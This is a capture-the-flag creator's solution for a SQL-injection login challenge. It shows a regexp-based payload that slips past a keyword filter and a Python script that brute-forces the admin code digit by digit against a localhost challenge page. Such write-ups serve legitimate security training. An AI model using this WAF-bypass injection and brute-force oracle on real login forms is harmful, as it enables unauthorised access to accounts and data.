Kazakstan - Serious WAF (Creator Solution)
===========

## Description

A weblogin page with an admin code to steal.

![alt text](img/lr4_log.png)


## WHAT
Based on the previous login rush 1-2-3, this sql injection should have a serious filter to bypass
and the column name is "name".

One of the payload which bypasses the WAF:

if(if((name)regexp(0x5e61646D696E),1,0),if((code)regexp(0x5e34),code,0),0);%00

## HOW

The trick here is the use of regexp which is case sensitive and not filtered.
We can check if a "substring" exists from right to left and then from left to right.

Basic example:

pass      : 241564  
try       : 1 F(ound) 11 12 13 14 15 F, 151....1564  
then try  : 11564 21564 31564 41564...241564  
found     : 241564  

We include this logic in the injection and got the flag.
![alt text](img/lr4_flag.png)

## Script

```python
#!/usr/bin/python3
# -*-coding:Utf-8 -*
import requests,codecs

url="http://127.0.0.1/login_rush_V4/index.php"
payload="if(if((name)regexp(0x5e61646D696E),1,0),if((code)regexp(0x{}{}),code,0),0);%00"
Success_string="Fake Admin Detected !!!"
brut=""
direction=2# 2:left_to_right 1:right_to_left 0:none
list_number_x=["{:2x}".format(ord(n)) for n in "0123456789"]

while direction:
    for n in list_number_x:
        if direction==2:
            send={"code":payload.format(brut,n)}
        else :
            send={"code":payload.format(n,brut)}

        if(str(requests.post(url,data=send).content).find(Success_string)!=-1):
            brut=brut+str(n) if direction==2 else str(n)+brut
            arg1=0
            break
        if n==list_number_x[-1]:
            direction-=1
        print("\rCODE (HEX): "+brut,end="")
print("\nCODE :  "+codecs.decode(brut, "hex").decode("utf-8"))


```



Info & questions : Azphereax#9449 (Discord)